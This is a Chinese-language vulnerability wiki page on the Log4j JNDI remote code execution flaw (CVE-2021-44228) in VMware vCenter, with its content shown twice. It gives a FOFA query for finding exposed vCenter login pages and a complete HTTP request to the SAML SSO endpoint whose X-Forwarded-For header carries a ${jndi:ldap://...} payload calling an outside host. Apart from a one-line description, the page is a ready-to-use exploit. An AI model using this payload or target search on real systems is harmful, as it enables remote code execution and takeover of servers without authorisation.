fofamini-wiki

登录白背景

源码

VMware vCenter Log4j JNDI 远程代码执行漏洞(CVE-2021-44228)

一、漏洞简介

VMware vCenter Server是美国威睿（Vmware）公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台，可自动实施和交付虚拟基础架构。VMware vCenter Log4j JNDI 远程代码执行漏洞

二、影响版本

VMware vCenter

三、资产测绘

fofatitle="ID_VC_Welcome"

四、漏洞复现

GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
X-Forwarded-For: ${jndi:ldap://ajiqmjisyr.dgrh3.cn}
Connection: close

原文: https://www.yuque.com/xiaokp7/ocvun2/dvsrrev2rn7wssrg

# VMware vCenter Log4j JNDI 远程代码执行漏洞(CVE-2021-44228)

# 一、漏洞简介
VMware vCenter Server是美国威睿（Vmware）公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台，可自动实施和交付虚拟基础架构。VMware vCenter Log4j JNDI 远程代码执行漏洞

# 二、影响版本

- VMware vCenter

# 三、资产测绘

- fofa`title="ID_VC_Welcome"`

![image.png](./img/KYats6iVUlBVLvX0/1716017090282-f90f105e-743a-48cd-bc8c-8043d4492021-943056.png)

# 四、漏洞复现
```
GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
X-Forwarded-For: ${jndi:ldap://ajiqmjisyr.dgrh3.cn}
Connection: close
```
![image.png](./img/KYats6iVUlBVLvX0/1716018272198-e348a7ab-c609-4d9f-98ff-002db9b416ca-493958.png)![image.png](./img/KYats6iVUlBVLvX0/1716018253310-40da2352-0582-4980-9905-2a06a0849a30-384324.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dvsrrev2rn7wssrg>